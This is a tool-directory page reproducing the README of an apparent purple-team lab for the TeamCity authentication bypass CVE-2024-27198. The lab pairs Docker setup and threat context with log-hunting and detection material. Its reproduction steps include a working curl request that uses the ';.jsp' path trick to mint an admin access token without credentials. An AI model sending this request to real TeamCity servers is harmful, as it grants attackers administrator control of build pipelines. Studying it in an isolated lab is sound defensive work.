Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-27198_Lab — Lab for the CVE-2024-27198 | Kitploit
工具/GitHubGitHub/cmpnn-romain/cve-2024-27198_lab
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingThreat IntelligenceIntrusion DetectionLearning & EducationIncident ResponseLog AnalysisLabs & Practice
1717天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
GitHub
cmpnn-romain/cve-2024-27198_lab

CVE-2024-27198_Lab

Lab for the CVE-2024-27198

查看仓库
分享
内容在请求的语言中不可用。显示英文版本。


CVE-2024-27198_Lab

Vulnerability Research & Purple Team Demonstration Lab for JetBrains TeamCity Authentication Bypass (CVE-2024-27198)

Table of Contents

  • About The Project
    • CVE Details
    • Built With
  • Threat Intelligence & OSINT
    • Real-World Impact & Exploitation
    • Why this CVE is Critical
  • Getting Started
    • Prerequisites
    • Installation & Lab Setup
  • Steps to Reproduce & Exploit
    • Login Portal
    • Test the Vulnerability
    • Generate Admin Token
    • Verify Token
    • Delete the Token
    • Blue Team: Hunting for IoCs in Logs
    • Stop the Containers
  • Mitigation & Detection
    • Technical Analysis (CWE-288)
    • Indicators of Compromise (IoCs)
    • Log Detection (Sigma Rule)
    • SIEM Live Demo (Blue Team)
    • Remediation
    • Network Detection (Suricata / Snort Rule)
    • Test the Patched Version
  • Links

About The Project

TeamCity provides an admin-only page for token management that is not protected by authentication. This allows an unauthenticated user to generate an access token for the admin user if they can find an ID of an existing user.

This repository contains a complete reproducible Dockerized lab with both vulnerable (:8111) and patched (:8112) TeamCity environments, automated exploitation scripts (exploit.py), Blue Team log-hunting walkthroughs, and a live SIEM event simulator (siem_simulator.py).

CVE Details

  • CVE ID: CVE-2024-27198
  • CWE: CWE-288 (Authentication Bypass Using an Alternate Path or Channel)
  • CNA: JetBrains s.r.o.
  • Base Score: 9.8 CRITICAL
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    • AV:N — Network
    • AC:L — Low
    • PR:N — None
    • UI:N — None
    • S:U — Unchanged
    • C:H — High
    • I:H — High
    • A:H — High

Built With

  • Docker
  • Python
  • JetBrains TeamCity
  • Sigma
  • Suricata

Threat Intelligence & OSINT

Real-World Impact & Exploitation

  • CISA KEV Catalog: Added on March 7, 2024, confirming active exploitation in the wild.
  • Threat Actors: Exploited by multiple ransomware groups and APTs, notably the BianLian ransomware group and the Jasmin ransomware variant. Attackers used this bypass to create rogue administrator accounts, deploy malicious plugins, and execute arbitrary code (RCE) to move laterally within victim networks.
  • Target Profile: CI/CD pipelines are high-value targets (Supply Chain Attacks). Compromising TeamCity allows attackers to inject malicious code into software builds, steal source code, and extract deployment secrets (AWS keys, certificates).

Why this CVE is Critical

The vulnerability lies in the REST API routing mechanism. By appending specific characters (like ?jsp=/app/rest/...;.jsp) to an unauthenticated endpoint, attackers can trick the TeamCity web server into routing the request to an authenticated endpoint while bypassing the security filters. This requires zero prior knowledge or access, making it a pure 9.8 CVSS.

Getting Started

To get a local copy of this lab up and running follow these simple example steps.

Prerequisites

  • Docker & Docker Compose
  • Python 3.10+
  • curl

Installation & Lab Setup

  1. Clone the repo
    git clone [email protected]:cmpnn-romain/CVE-2024-27198_Lab.git
    
  2. Change directory
    cd CVE-2024-27198_Lab
    
  3. Start the containers
    docker compose up -d
    
  • Access the vulnerable TeamCity instance at: http://localhost:8111
  • Access the patched TeamCity instance at: http://localhost:8112

Steps to Reproduce & Exploit

Login Portal

Username:

admin

Password:

admin

Test the vulnerability

GET request for a resource without authentication:

curl -i http://localhost:8111/app/rest/users
curl -i http://localhost:8112/app/rest/users

Both should return an error with 401 status code.

Generate a token for admin user

curl -X POST -H "Content-Type: application/json" \
  "http://localhost:8111/hax?jsp=/app/rest/users/id:1/tokens/REDTEAM;.jsp" \
  -d '{"name":"REDTEAM"}'

This should return a token like this (The token is different every time):

eyJ0eXAiOiAiVENWMiJ9.T1AzMHJjY3piNC1QWDlFenpnLXdCUkRuSF84.ZmJlODg3ZDQtNjFmYy00ZGQxLTk2MDAtYmJlYjViZjE4NGFi
curl -X POST -H "Content-Type: application/json" \
  "http://localhost:8112/hax?jsp=/app/rest/users/id:1/tokens/REDTEAM;.jsp" \
  -d '{"name":"REDTEAM"}'

This should return an error with 401 status code because the patched instance does not have the vulnerability.

Verify token

curl -i -H "Authorization: Bearer <TOKEN>" \
  http://localhost:8111/app/rest/users

Should return the list of users.

Delete the token

  1. Go to http://localhost:8111 with admin account.
  2. Click on the profile icon on the top right.
  3. Go to Profile -> Access Tokens.
  4. You will see the "REDTEAM" token.
  5. Simply click Delete next to the token.

Blue Team: Hunting for IoCs in Logs (The Stealth Factor)

During the demonstration on the lab, you can show a massive Blue Team finding: by default, this vulnerability is incredibly stealthy!

  1. Tomcat access logs are disabled by default in the TeamCity Docker image, so the ;.jsp HTTP requests are not logged.
  2. The TeamCity audit log does not log token creation via the REST API.

So how do we catch it? When the attacker cleans up their tracks! When the attacker deletes their rogue token to hide, TeamCity does log that.

Find the attacker covering their tracks in the audit logs:

docker exec teamcity-vulnerable grep "delete_token" /opt/teamcity/logs/teamcity-activities.log

(You will see a log entry indicating that the "REDTEAM" token was deleted).

Stop the containers

docker compose down

Mitigation & Detection

Technical Analysis (CWE-288)

This vulnerability is an instance of CWE-288: Authentication Bypass Using an Alternate Path or Channel. The flaw stems from a path confusion issue between the Tomcat web server and the TeamCity application router. By appending ;.jsp and passing the target REST API endpoint in the jsp= parameter, the initial security filter interprets the request as an unauthenticated request to a public .jsp file (which is allowed). However, the internal router strips the ;.jsp and forwards the request to the restricted /app/rest/ endpoint without enforcing the authentication filter.

下载工具